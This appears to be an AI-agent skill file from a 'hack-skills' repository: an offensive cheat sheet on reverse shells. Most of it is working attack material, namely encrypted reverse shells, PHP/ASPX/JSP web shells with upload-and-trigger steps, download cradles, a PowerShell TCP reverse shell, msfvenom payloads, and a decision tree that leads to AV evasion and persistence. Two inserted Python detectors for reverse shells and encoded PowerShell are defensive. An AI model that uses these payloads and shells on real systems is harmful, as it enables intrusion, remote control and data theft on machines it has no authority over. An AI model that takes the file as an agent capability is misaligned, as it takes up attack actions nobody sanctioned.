reverse-shell-techniques

INSTALLATION

```shell
npx skills add https://github.com/yaklang/hack-skills --skill reverse-shell-techniques
```

Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md

## 1. REVERSE vs BIND SHELL DECISION

| Factor | Reverse Shell | Bind Shell |
|---|---|---|
| Firewall (egress) | Works if outbound allowed | Blocked by egress filtering |
| Firewall (ingress) | Not blocked | Requires inbound access to victim |
| NAT | Works (victim connects out) | Fails (can't reach victim behind NAT) |
| Detection | Outbound connection — less suspicious | Listening port — easily detected |
| Default choice | Almost always preferred | Only when no egress + have inbound |

## 2. ENCRYPTED SHELLS

### OpenSSL Reverse Shell

```bash
# Attacker: generate cert + listen
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj '/CN=localhost'
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

# Victim:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER:4444 > /tmp/s; rm /tmp/s
```

### Socat Encrypted Shell

```bash
# Attacker: generate cert + listen
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 30 -out shell.crt
cat shell.key shell.crt > shell.pem
socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork STDOUT

# Victim:
socat OPENSSL:ATTACKER:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
```

### Ncat SSL

```bash
# Attacker:
ncat --ssl -lvnp 4444

# Victim:
ncat --ssl ATTACKER 4444 -e /bin/bash
```
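Detection-side counterpart to sections 1 and 2, as an added example that is not part of this skill: the "outbound connection — less suspicious" row in the table above holds for network telemetry, but on the host both shapes shown here are visible through `/proc/<pid>/fd`. A `bash -i >& /dev/tcp/...` shell has a socket on fd 0/1/2; the `mkfifo ... | openssl s_client` and socat/ncat variants instead have a shell whose standard streams are a pipe or FIFO that a relay process (openssl, socat, ncat, nc) also holds open next to a socket, and TLS does nothing to hide that. The snapshot below is constructed; the `Proc` shape, the function names and all inode numbers are assumptions.

```python
"""Flag shell processes wired to a network socket, directly or via a relay.

Input is a list of Proc records in the shape one would collect from
/proc/<pid>/comm, /proc/<pid>/cmdline and readlink /proc/<pid>/fd/<n>.
"""
from dataclasses import dataclass

SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
RELAYS = {"openssl", "socat", "ncat", "nc"}


@dataclass
class Proc:
    pid: int
    comm: str      # /proc/<pid>/comm
    cmdline: str   # /proc/<pid>/cmdline with NULs replaced by spaces
    fds: dict      # fd number -> readlink(/proc/<pid>/fd/<n>)


def norm(target: str) -> str:
    # A FIFO unlinked after being opened (mkfifo ...; rm /tmp/s) keeps its
    # path in the fd link, suffixed with " (deleted)".
    return target.replace(" (deleted)", "")


def is_socket(target: str) -> bool:
    return target.startswith("socket:[")


def is_shared_stream(target: str) -> bool:
    # Anonymous pipes appear as "pipe:[inode]", named FIFOs as a path.
    # Terminals and /dev/null are not streams another process relays.
    return target.startswith("pipe:[") or (
        target.startswith("/") and not target.startswith("/dev/"))


def holds_socket(p: Proc) -> bool:
    return any(is_socket(norm(t)) for t in p.fds.values())


def find_reverse_shells(procs):
    """Return (pid, reason) for every shell whose stdio leads to a socket."""
    findings = []
    for p in procs:
        if p.comm not in SHELLS:
            continue
        stdio = [norm(p.fds.get(fd, "")) for fd in (0, 1, 2)]
        # Indicator 1: the shell's own standard streams are a socket.
        if any(is_socket(t) for t in stdio):
            findings.append((p.pid, "shell stdio is a socket"))
            continue
        # Indicator 2: a standard stream is a pipe/FIFO that a socket-holding
        # relay process also has open (the openssl/socat/ncat pattern).
        for t in stdio:
            if not is_shared_stream(t):
                continue
            relay = next((q for q in procs
                          if q.pid != p.pid and q.comm in RELAYS and holds_socket(q)
                          and t in {norm(x) for x in q.fds.values()}), None)
            if relay is not None:
                findings.append(
                    (p.pid, f"shell stdio {t} relayed via {relay.comm} (pid {relay.pid})"))
                break
    return findings


# Constructed snapshot (assumed values, not real process data).
SNAPSHOT = [
    # interactive login shell on a terminal: benign
    Proc(100, "bash", "-bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    # bash -i >& /dev/tcp/...: all three streams on one socket
    Proc(200, "bash", "bash -i", {0: "socket:[41233]", 1: "socket:[41233]", 2: "socket:[41233]"}),
    # mkfifo /tmp/s; sh -i </tmp/s 2>&1 | openssl s_client ... >/tmp/s; rm /tmp/s
    Proc(300, "sh", "/bin/sh -i", {0: "/tmp/s (deleted)", 1: "pipe:[5151]", 2: "pipe:[5151]"}),
    Proc(301, "openssl", "openssl s_client -quiet -connect ATTACKER:4444",
         {0: "pipe:[5151]", 1: "/tmp/s (deleted)", 2: "/dev/null", 3: "socket:[52000]"}),
    # ordinary pipeline with no socket anywhere: benign
    Proc(400, "bash", "bash -c 'dmesg | grep usb'", {0: "/dev/pts/1", 1: "pipe:[7000]", 2: "/dev/pts/1"}),
    Proc(401, "grep", "grep usb", {0: "pipe:[7000]", 1: "/dev/pts/1", 2: "/dev/pts/1"}),
    # shell logging to a file that no relay shares: benign
    Proc(500, "sh", "sh build.sh", {0: "/dev/null", 1: "/var/log/build.log", 2: "/var/log/build.log"}),
]

if __name__ == "__main__":
    for pid, reason in find_reverse_shells(SNAPSHOT):
        print(pid, reason)
```

On a live host the same walk is `for pid in /proc/[0-9]*; readlink $pid/fd/{0,1,2}` plus a second pass over the relay candidates' fds; the point of checking the relay's fds rather than only the shell's is that the FIFO variant above leaves the shell itself without any socket.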

## 3. WEB SHELLS

### PHP

```php
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>

<!-- Minimal stealth shell -->
<?=`$_GET[0]`?>

<!-- POST-based with password -->
<?php if($_POST['k']==='SECRET'){system($_POST['cmd']);} ?>
```

### ASPX

```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<% Process.Start(new ProcessStartInfo("cmd.exe","/c "+Request["cmd"]){UseShellExecute=false,RedirectStandardOutput=true}).StandardOutput.ReadToEnd(); %>
```

### JSP

```jsp
<%@ page import="java.io.*" %>
<% Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
String l;while((l=br.readLine())!=null){out.println(l);} %>
```

### Upload + Trigger Patterns

1. Find upload endpoint → upload shell with allowed extension bypass
2. Locate uploaded file (predictable path, directory listing, response leak)
3. Trigger: `GET /uploads/shell.php?cmd=id`
4. Upgrade to reverse shell: `?cmd=bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'`

## 4. PTY UPGRADE SEQUENCE

### Standard Python Upgrade

```bash
# Step 1: Spawn PTY
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Step 2: Background shell
# Press Ctrl+Z

# Step 3: Configure terminal (on attacker)
stty raw -echo; fg

# Step 4: Set environment (back in shell)
export TERM=xterm-256color
stty rows 40 cols 160
```

### Alternative Upgrades

```bash
# script command
script /dev/null -c bash

# socat full PTY (requires socat on victim)
# Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:4444

# rlwrap for readline support (attacker side)
rlwrap nc -lvnp 4444

# expect
/usr/bin/expect -c 'spawn bash; interact'
```

## 5. FILE TRANSFER METHODS

### Linux

```bash
# wget / curl
wget http://ATTACKER:8000/file -O /tmp/file
curl http://ATTACKER:8000/file -o /tmp/file

# Python HTTP server (attacker side)
python3 -m http.server 8000

# nc file transfer
# Receiver:
nc -lvnp 9999 > file
# Sender:
nc RECEIVER 9999 < file

# base64 encode/decode (no tools needed)
# Encode on source:
base64 -w0 file
# Paste on target:
echo "BASE64_STRING" | base64 -d > file

# scp through pivot
scp -o ProxyJump=pivot user@target:/path/file ./local
```

### Windows

```powershell
# PowerShell DownloadFile
(New-Object Net.WebClient).DownloadFile('http://ATTACKER/file','C:\temp\file')

# PowerShell Invoke-WebRequest (PS 3.0+)
Invoke-WebRequest -Uri http://ATTACKER/file -OutFile C:\temp\file
iwr http://ATTACKER/file -o C:\temp\file

# certutil
certutil -urlcache -f http://ATTACKER/file C:\temp\file

# bitsadmin
bitsadmin /transfer job /download /priority high http://ATTACKER/file C:\temp\file

# SMB share (attacker hosts)
# Attacker: impacket-smbserver share /tmp/share -smb2support
copy \\ATTACKER\share\file C:\temp\file
```

## 6. POWERSHELL REVERSE SHELLS

```powershell
# One-liner TCP reverse shell
$c=New-Object Net.Sockets.TCPClient('ATTACKER',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()

# Download cradle + execute
powershell -nop -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

# Base64 encoded execution
$cmd = '...reverse shell code...'
$bytes = [Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -ep bypass -enc $encoded
```
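Everything in sections 5 and 6 leaves a process-creation command line, and the `-enc` form only moves the script into a base64 argument: `[Text.Encoding]::Unicode` is UTF-16LE, so a collector can decode it back before matching. The added example below (not part of this skill) triages command lines of the kind Sysmon event 1 or Security event 4688 record: it decodes `-e`/`-enc`/`-EncodedCommand` blobs, then tags download cradles (IEX together with DownloadString/DownloadFile/WebClient/Invoke-WebRequest), `Net.Sockets.TCPClient` use, hidden-window and execution-policy flags, and certutil/bitsadmin downloads. The log lines are constructed; the encoded sample is built in-code from the first line of the TCPClient one-liner above, and the tag names are assumptions.

```python
"""Triage Windows process-creation command lines for the patterns above."""
import base64
import re

# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob (UTF-16LE script)
ENC_ARG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
TCPCLIENT = re.compile(r"net\.sockets\.tcpclient", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass|-nop\b", re.I)
CERTUTIL = re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)
BITSADMIN = re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b", re.I)


def split_encoded(cmdline: str):
    """Return (cmdline with the blob replaced by <encoded>, decoded script or None)."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return cmdline, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not base64 / odd byte count
        decoded = None
    return cmdline[:m.start(1)] + "<encoded>" + cmdline[m.end(1):], decoded


def triage(cmdline: str) -> dict:
    plain, decoded = split_encoded(cmdline)
    # Match script-content rules on the visible text plus the decoded script;
    # match launcher-flag rules on the visible text only, so that base64
    # characters can never spell a flag by accident.
    script = plain + ("\n" + decoded if decoded else "")
    tags = []
    if IEX.search(script) and DOWNLOAD.search(script):
        tags.append("download-cradle")
    if TCPCLIENT.search(script):
        tags.append("raw-tcp-client")
    if HIDDEN.search(plain):
        tags.append("hidden-or-bypass-flags")
    if CERTUTIL.search(plain):
        tags.append("certutil-download")
    if BITSADMIN.search(plain):
        tags.append("bitsadmin-download")
    return {"decoded": decoded, "tags": tags}


def encode_command(script: str) -> str:
    """Same transform as [Text.Encoding]::Unicode + ToBase64String; builds the sample only."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines (assumed values, in the form a process-creation log carries).
SAMPLE_LINES = [
    'powershell -nop -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(\'http://ATTACKER/shell.ps1\')"',
    "powershell -ep bypass -enc " + encode_command("$c=New-Object Net.Sockets.TCPClient('ATTACKER',4444)"),
    r"certutil -urlcache -f http://ATTACKER/file C:\temp\file",
    r"bitsadmin /transfer job /download /priority high http://ATTACKER/file C:\temp\file",
    'powershell -Command "Get-Service | Where-Object Status -eq Running"',   # benign
    r"certutil -hashfile C:\temp\file SHA256",                               # benign certutil use
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        result = triage(line)
        print(result["tags"], "|", line[:60])
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```

Decoding before matching is the part that matters: the second sample line shows no `TCPClient` string in the raw event, and a rule that only inspects the visible command line would see a `-enc` launch and nothing else. The flag rule on its own is noisy (administrators use `-ep bypass` legitimately), which is why it is a separate tag that adds weight to the content tags rather than an alert by itself.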

## 7. MSFVENOM PAYLOADS

```bash
# Linux reverse shell (ELF)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell

# Windows reverse shell (EXE)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe

# Meterpreter (staged)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o meter.exe

# Web payloads
msfvenom -p php/reverse_php LHOST=ATTACKER LPORT=4444 -f raw > shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw > shell.jsp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f aspx -o shell.aspx

# DLL / HTA / VBS
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll -o evil.dll
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f hta-psh -o evil.hta
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f vbs -o evil.vbs
```

## 8. DECISION TREE

```text
Need remote shell on target
│
├── Can execute commands already (RCE)?
│   ├── Linux target?
│   │   ├── bash/python/perl available? → one-liner reverse shell (CHEATSHEET.md)
│   │   ├── Need encryption? → OpenSSL or socat SSL shell (§2)
│   │   └── Outbound blocked? → bind shell or tunnel (see tunneling-and-pivoting)
│   │
│   ├── Windows target?
│   │   ├── PowerShell available? → PS reverse shell (§6)
│   │   ├── Need binary? → msfvenom payload (§7)
│   │   └── AV blocking? → load windows-av-evasion skill
│   │
│   └── Web server (upload possible)?
│       ├── PHP? → PHP web shell (§3) → upgrade to reverse shell
│       ├── ASP.NET? → ASPX shell (§3)
│       └── Java/Tomcat? → JSP shell (§3)
│
├── Got a dumb shell?
│   ├── Python available? → PTY upgrade (§4)
│   ├── script available? → script /dev/null -c bash (§4)
│   ├── socat on target? → socat full PTY (§4)
│   └── None? → rlwrap on attacker side for readline
│
├── Need to transfer tools?
│   ├── Linux: wget/curl/nc/base64 (§5)
│   ├── Windows: certutil/PowerShell/bitsadmin/SMB (§5)
│   └── No outbound? → base64 copy-paste (§5)
│
└── Shell established — next steps?
    ├── Privilege escalation → load linux/windows-privilege-escalation
    ├── Pivot to internal network → load tunneling-and-pivoting
    └── Persistence → implant backdoor
```